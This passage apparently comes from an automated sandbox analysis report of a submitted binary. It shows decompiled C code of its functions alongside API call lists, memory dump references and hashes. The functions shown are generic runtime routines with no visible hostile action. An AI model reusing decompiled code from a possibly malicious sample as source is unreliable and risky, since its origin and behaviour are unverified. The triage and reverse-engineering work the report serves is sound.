							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x45a3f0; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}




















                                                                              0x00412ac9
                                                                              0x00412aca
                                                                              0x00412acf
                                                                              0x00412ae0
                                                                              0x00412b59
                                                                              0x00412b59
                                                                              0x00412ae2
                                                                              0x00412ae2
                                                                              0x00412ae9
                                                                              0x00412aef
                                                                              0x00412af2
                                                                              0x00412afe
                                                                              0x00412b05
                                                                              0x00412b10
                                                                              0x00412b14
                                                                              0x00412b17
                                                                              0x00000000
                                                                              0x00412b19
                                                                              0x00412b1c
                                                                              0x00412b7a
                                                                              0x00000000
                                                                              0x00412b1e
                                                                              0x00412b1e
                                                                              0x00412b26
                                                                              0x00412b3c
                                                                              0x00412b42
                                                                              0x00000000
                                                                              0x00412b44
                                                                              0x00412b48
                                                                              0x00412b4b
                                                                              0x00412b4e
                                                                              0x00412b57
                                                                              0x00412b5f
                                                                              0x00412b61
                                                                              0x00412b61
                                                                              0x00412b6d
                                                                              0x00412b73
                                                                              0x00412b7d
                                                                              0x00412b80
                                                                              0x00412b93
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00412b50
                                                                              0x00412b52
                                                                              0x00412b52
                                                                              0x00412b4e
                                                                              0x00000000
                                                                              0x00412b42
                                                                              0x00000000
                                                                              0x00412b26
                                                                              0x00412b1c
                                                                              0x00412b17
                                                                              0x00412b99
                                                                              0x00412ba0

                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00412AD8
                                                                              • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00412AE9
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00412B2F
                                                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00412B6D
                                                                              • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 00412B93
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                              • String ID:
                                                                              • API String ID: 4136887677-0
                                                                              • Opcode ID: 24b56995ca49bf355e2cb5cc3bdc514839b2c42c370d55998e18faebaea88396
                                                                              • Instruction ID: 6821be03d93957d4a86eb00c23eda80211210b287ceef23d4a63bb871c2732e5
                                                                              • Opcode Fuzzy Hash: 24b56995ca49bf355e2cb5cc3bdc514839b2c42c370d55998e18faebaea88396
                                                                              • Instruction Fuzzy Hash: 5731D772D0421AEBCF10CFA4DE44AED7BB8EB04354F140166E901E7290D7B8AE95DB98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418520, Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00418520() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x457184; // 0xb7aa1229
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x457184 = _t22;
					if(_t22 == 0) {
						 *0x457184 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}












                                                                              0x00418526
                                                                              0x0041852d
                                                                              0x0041853b
                                                                              0x00418547
                                                                              0x0041854f
                                                                              0x00418557
                                                                              0x00418563
                                                                              0x0041856c
                                                                              0x0041856f
                                                                              0x00418571
                                                                              0x00418577
                                                                              0x00418579
                                                                              0x00418579
                                                                              0x00000000
                                                                              0x00418583
                                                                              0x00418585

                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0041853B
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418547
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041854F
                                                                              • GetTickCount.KERNEL32 ref: 00418557
                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00418563
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                              • String ID:
                                                                              • API String ID: 1445889803-0
                                                                              • Opcode ID: a8da04e51018533badeaf7116519ce99b09b31bc1189681f021e828040a29251
                                                                              • Instruction ID: cd8a03b86fe6545635f6655c9ee535c1cb9f5b8208012e5efd043c1a9a1715ec
                                                                              • Opcode Fuzzy Hash: a8da04e51018533badeaf7116519ce99b09b31bc1189681f021e828040a29251
                                                                              • Instruction Fuzzy Hash: F7F0F972C00218ABCF209FB4EF4859FB7F8FB082417860975DD11F7211EA74EA408A98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C2AE, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 91%
                                                                              			E0042C2AE(void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t20;

				_t20 = __esi;
				_t10 =  *0x457184; // 0xb7aa1229
				_v8 = _t10;
				if(_a8 != 0x800) {
					if(GetLocaleInfoA(_a8, 3,  &_a8, 4) != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t20);
					_t15 = E00412F33( &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E00412FBB(_t12, _v8);
			}








                                                                              0x0042c2ae
                                                                              0x0042c2be
                                                                              0x0042c2c3
                                                                              0x0042c2c9
                                                                              0x0042c31c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c31e
                                                                              0x0042c2cb
                                                                              0x0042c2d1
                                                                              0x0042c2d7
                                                                              0x0042c2d7
                                                                              0x0042c2ec
                                                                              0x0042c2f7
                                                                              0x0042c320
                                                                              0x0042c2fd
                                                                              0x0042c304
                                                                              0x0042c304
                                                                              0x0042c322
                                                                              0x0042c32c

                                                                              APIs
                                                                              • lstrcpyA.KERNEL32(00000800,LOC), ref: 0042C2D1
                                                                              • LoadLibraryA.KERNEL32(?), ref: 0042C304
                                                                              • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 0042C314
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLibraryLoadLocalelstrcpy
                                                                              • String ID: LOC
                                                                              • API String ID: 864663389-519433814
                                                                              • Opcode ID: 91cc94fd048d3c7b72ac94f4014fedd723e12cd0985f239881296d65061c0b5e
                                                                              • Instruction ID: 6ca95c4da7eb7bf9040ece9e67385bb11b6d4fb20bb8cb2009f8f5314762c45b
                                                                              • Opcode Fuzzy Hash: 91cc94fd048d3c7b72ac94f4014fedd723e12cd0985f239881296d65061c0b5e
                                                                              • Instruction Fuzzy Hash: EF01A731A00118BBDF10DB64ED459DF377CAB00320F808563FD15D2191DB78CE459B9A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00428065, Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00428065(void* __ecx, CHAR* _a4) {
				void* __edi;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t16;
				void* _t17;

				_t14 = 0;
				_t11 = 0;
				_t17 = __ecx;
				if(_a4 == 0) {
					L4:
					_t15 = E004271CA(_t17, _t14, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t15;
				}
				_t16 =  *(E0042D179() + 0xc);
				_t8 = FindResourceA(_t16, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t16, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}











                                                                              0x00428069
                                                                              0x0042806b
                                                                              0x00428071
                                                                              0x00428073
                                                                              0x004280a8
                                                                              0x004280b2
                                                                              0x004280b4
                                                                              0x004280bb
                                                                              0x004280bb
                                                                              0x00000000
                                                                              0x004280c1
                                                                              0x0042807a
                                                                              0x00428087
                                                                              0x0042808f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00428093
                                                                              0x00428099
                                                                              0x0042809d
                                                                              0x004280a6
                                                                              0x00000000
                                                                              0x004280a6
                                                                              0x004280c7

                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,?,000000F0), ref: 00428087
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,004248BD,?,?,00407EBD), ref: 00428093
                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,004248BD,?,?,00407EBD), ref: 004280A0
                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,004248BD,?,?,00407EBD), ref: 004280BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoadLock
                                                                              • String ID:
                                                                              • API String ID: 1078018258-0
                                                                              • Opcode ID: ea4493c78dc4185e71a7d16939d3037bb29456f139a1174a12b4f14a5a3035e2
                                                                              • Instruction ID: 284b38b7637ae8020e4983b568648d380c2f725140e330615f9ed471a7ccb9db
                                                                              • Opcode Fuzzy Hash: ea4493c78dc4185e71a7d16939d3037bb29456f139a1174a12b4f14a5a3035e2
                                                                              • Instruction Fuzzy Hash: 8EF096363032215B93111FA67D4493FB69C9FD5752746007EFE05D3311DF658C0985AD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004267FF, Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 88%
                                                                              			E004267FF(void* __ecx) {
				signed int _t5;
				void* _t15;
				void* _t19;

				_t15 = __ecx;
				if((E00428375(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E00426363(_t15);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E00408116();
				if(_t19 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x1c), 0x111, 0xe146, 0);
					return 1;
				}
			}






                                                                              0x00426802
                                                                              0x0042680e
                                                                              0x00426856
                                                                              0x00426858
                                                                              0x0042685f
                                                                              0x00000000
                                                                              0x00426861
                                                                              0x00426815
                                                                              0x00426819
                                                                              0x00000000
                                                                              0x0042683c
                                                                              0x0042684b
                                                                              0x00000000
                                                                              0x00426853

                                                                              APIs
                                                                                • Part of subcall function 00428375: GetWindowLongA.USER32 ref: 00428380
                                                                              • GetKeyState.USER32(00000010), ref: 00426823
                                                                              • GetKeyState.USER32(00000011), ref: 0042682C
                                                                              • GetKeyState.USER32(00000012), ref: 00426835
                                                                              • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0042684B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: State$LongMessageSendWindow
                                                                              • String ID:
                                                                              • API String ID: 1063413437-0
                                                                              • Opcode ID: c749473ecdc197767b1aada0aac7563496d0904765f4c70556c9bccb0dd829c8
                                                                              • Instruction ID: de9f64a4c44467bbe143d1cc0095200852411478b543e347cc288a0361768c2f
                                                                              • Opcode Fuzzy Hash: c749473ecdc197767b1aada0aac7563496d0904765f4c70556c9bccb0dd829c8
                                                                              • Instruction Fuzzy Hash: 6DF0E932B4136B26E92036757E41FA951154F50BD4F93053EB741EA1E1C999C842517C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004070AE, Relevance: 4.6, APIs: 3, Instructions: 55comCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 16%
                                                                              			E004070AE(signed int* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr* _t16;
				signed char* _t18;
				signed char _t19;
				signed char _t21;
				signed int* _t27;
				signed char* _t28;

				_t27 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx));
				if(_t16 != 0) {
					_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
				}
				if((_a12 & 0x00000014) == 0) {
					__imp__CoCreateInstance(_a4, _a8, _a12, 0x448de4, _t27);
					_t28 = _t16;
					goto L8;
				} else {
					_t18 =  &_a12;
					__imp__CoCreateInstance(_a4, _a8, _a12, 0x448e34, _t18);
					_t28 = _t18;
					if(_t28 < 0) {
						L9:
						 *_t27 =  *_t27 & 0x00000000;
					} else {
						__imp__OleRun(_a12);
						_t28 = _t18;
						if(_t28 >= 0) {
							_t21 = _a12;
							_t28 =  *((intOrPtr*)( *_t21))(_t21, 0x448de4, _t27);
						}
						_t19 = _a12;
						 *((intOrPtr*)( *_t19 + 8))(_t19);
						L8:
						if(_t28 < 0) {
							goto L9;
						}
					}
				}
				return _t28;
			}









                                                                              0x004070b3
                                                                              0x004070b5
                                                                              0x004070b9
                                                                              0x004070be
                                                                              0x004070be
                                                                              0x004070c5
                                                                              0x0040711e
                                                                              0x00407124
                                                                              0x00000000
                                                                              0x004070c7
                                                                              0x004070c7
                                                                              0x004070d9
                                                                              0x004070df
                                                                              0x004070e3
                                                                              0x0040712a
                                                                              0x0040712a
                                                                              0x004070e5
                                                                              0x004070e8
                                                                              0x004070ee
                                                                              0x004070f2
                                                                              0x004070f4
                                                                              0x00407102
                                                                              0x00407102
                                                                              0x00407104
                                                                              0x0040710a
                                                                              0x00407126
                                                                              0x00407128
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00407128
                                                                              0x004070e3
                                                                              0x00407132

                                                                              APIs
                                                                              • CoCreateInstance.OLE32(?,?,00000014,00448E34,00000014), ref: 004070D9
                                                                              • OleRun.OLE32(00000014), ref: 004070E8
                                                                              • CoCreateInstance.OLE32(?,?,00000014,00448DE4), ref: 0040711E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance
                                                                              • String ID:
                                                                              • API String ID: 542301482-0
                                                                              • Opcode ID: 008e3c5bf3d513a8e4334fe68e7b00c51266009127cbb7e57eea7ce5dc358ab9
                                                                              • Instruction ID: df968472f2a30f4e8afbd354e240adff9c1abe96be566551f296f114c8baa3e9
                                                                              • Opcode Fuzzy Hash: 008e3c5bf3d513a8e4334fe68e7b00c51266009127cbb7e57eea7ce5dc358ab9
                                                                              • Instruction Fuzzy Hash: B511CE32A01259ABCB118F54DC08E9F7BA9FF48750B04046AFD04EB3A0CB75DC21CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040921B, Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 79%
                                                                              			E0040921B(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E004090D5() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E004091CF( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x459e14(_a4, _a8);
			}





                                                                              0x00409228
                                                                              0x0040923c
                                                                              0x00409250
                                                                              0x00409268
                                                                              0x00409252
                                                                              0x00409259
                                                                              0x00409259
                                                                              0x00409270
                                                                              0x00000000
                                                                              0x00409272
                                                                              0x00000000
                                                                              0x00409279
                                                                              0x00409270
                                                                              0x00000000
                                                                              0x0040923e
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b9157ff96af5f477ae6894758ac003b40a30abe25fd5fb61eda09e00addd38e2
                                                                              • Instruction ID: a17398dba48966c6a2a939587567f5a6a8b2f72131f7c8430831e65f48f5173c
                                                                              • Opcode Fuzzy Hash: b9157ff96af5f477ae6894758ac003b40a30abe25fd5fb61eda09e00addd38e2
                                                                              • Instruction Fuzzy Hash: 78F03C31104109FBDF019F61CD08AAF3B69AB00384B44C87AFC15A51A2DB38DE15EB59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041C3FD, Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E0041C3FD(void* __eflags) {
				void* _t6;
				void* _t10;
				signed char _t16;
				intOrPtr _t19;

				_t6 = E00411A30( *0x45a85c);
				asm("sbb eax, eax");
				 *0x45a84c =  ~(_t6 - 3) + 1;
				_t10 = E00411A30( *0x45a854);
				asm("sbb eax, eax");
				 *0x45a844 =  *0x45a844 & 0x00000000;
				 *0x45a850 =  ~(_t10 - 3) + 1;
				if( *0x45a84c == 0) {
					_t19 =  *0x45a85c; // 0x0
					 *0x45a858 = E0041BFBF(_t19);
				} else {
					 *0x45a858 = 2;
				}
				EnumSystemLocalesA(E0041C0E1, 1);
				_t16 =  *0x45a840; // 0x0
				if((_t16 & 0x00000001) == 0 || (_t16 & 0x00000002) == 0 || (_t16 & 0x00000007) == 0) {
					 *0x45a840 =  *0x45a840 & 0x00000000;
					return _t16;
				}
				return _t16;
			}







                                                                              0x0041c403
                                                                              0x0041c413
                                                                              0x0041c416
                                                                              0x0041c41b
                                                                              0x0041c425
                                                                              0x0041c427
                                                                              0x0041c438
                                                                              0x0041c43d
                                                                              0x0041c44b
                                                                              0x0041c456
                                                                              0x0041c43f
                                                                              0x0041c43f
                                                                              0x0041c43f
                                                                              0x0041c462
                                                                              0x0041c468
                                                                              0x0041c470
                                                                              0x0041c47b
                                                                              0x00000000
                                                                              0x0041c47b
                                                                              0x0041c482

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen$EnumLocalesSystem
                                                                              • String ID:
                                                                              • API String ID: 2581538701-0
                                                                              • Opcode ID: 397dc5525731e4d1ed9fa53f79144a7a2530db3f159908524ae49eca629d310d
                                                                              • Instruction ID: d1754681698c12adbf08de891305ba89e2cb33efab6d618a24f5b9f89e6f18bc
                                                                              • Opcode Fuzzy Hash: 397dc5525731e4d1ed9fa53f79144a7a2530db3f159908524ae49eca629d310d
                                                                              • Instruction Fuzzy Hash: 2FF0E1B15E43059BD710FF74ED497A13BE1E71534AF10433AE941822A2D77D84978E4E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00406115, Relevance: 4.5, APIs: 3, Instructions: 34threadCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00406115(void* __ecx) {
				char _v12;
				intOrPtr* _t13;
				char _t16;
				signed int _t20;
				int _t21;

				_t20 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v12, 7) == 0) {
					L4:
					_t21 = GetACP();
				} else {
					_t16 = _v12;
					_t13 =  &_v12;
					if(_t16 == 0) {
						goto L4;
					} else {
						do {
							_t13 = _t13 + 1;
							_t20 = _t16 + (_t20 + _t20 * 4) * 2 - 0x30;
							_t16 =  *_t13;
						} while (_t16 != 0);
						if(_t20 == 0) {
							goto L4;
						}
					}
				}
				return _t21;
			}








                                                                              0x0040611b
                                                                              0x00406137
                                                                              0x00406158
                                                                              0x0040615e
                                                                              0x00406139
                                                                              0x00406139
                                                                              0x0040613e
                                                                              0x00406141
                                                                              0x00000000
                                                                              0x00406143
                                                                              0x00406143
                                                                              0x00406149
                                                                              0x0040614a
                                                                              0x0040614e
                                                                              0x00406150
                                                                              0x00406156
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00406156
                                                                              0x00406141
                                                                              0x00406164

                                                                              APIs
                                                                              • GetThreadLocale.KERNEL32 ref: 0040611D
                                                                              • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 0040612F
                                                                              • GetACP.KERNEL32 ref: 00406158
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Locale$InfoThread
                                                                              • String ID:
                                                                              • API String ID: 4232894706-0
                                                                              • Opcode ID: 439a75d1e5748ae0847bbb2f985a78c7a8542bd026c2596fab21e1996c1577f7
                                                                              • Instruction ID: bc7a51ce8ecd3892d1d6f77204990e6895641d7df39400fc7562854e56c7665f
                                                                              • Opcode Fuzzy Hash: 439a75d1e5748ae0847bbb2f985a78c7a8542bd026c2596fab21e1996c1577f7
                                                                              • Instruction Fuzzy Hash: C5F0E9319002397BDB114B50CC15AEF7BAC9F05B91F0501A9ED53FB241E6B4AD0483D8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040EF2E, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E0040EF2E(signed int* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t240;
				intOrPtr* _t241;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t260;
				signed int _t263;
				signed int _t267;
				void* _t272;
				void* _t274;
				signed int _t276;
				void* _t278;
				signed int _t281;
				void* _t304;
				intOrPtr* _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t319;
				signed int* _t320;
				intOrPtr _t342;
				signed int _t346;
				signed int _t359;
				signed int _t390;
				signed int _t392;
				signed int _t396;
				void* _t402;
				signed int _t405;
				signed int _t408;
				signed int _t410;
				signed int _t414;
				void* _t416;
				signed int _t418;
				signed int _t422;
				void* _t423;
				signed int _t427;
				signed int _t430;
				void* _t432;
				void* _t434;
				intOrPtr _t435;
				signed int _t439;

				E004128A0(E004311AF, _t432);
				_t435 = _t434 - 0x54;
				_t240 =  *0x457184; // 0xb7aa1229
				 *(_t432 - 0x3c) =  *(_t432 - 0x3c) & 0x00000000;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t320 = __ecx;
				 *((intOrPtr*)(_t432 - 0x14)) = _t240;
				 *((intOrPtr*)(_t432 - 0x10)) = _t435;
				 *((intOrPtr*)(_t432 - 0x48)) = __ecx;
				asm("movsd");
				 *((char*)(_t432 - 0x3d)) = 0;
				_t241 =  *((intOrPtr*)(_t432 + 8));
				 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
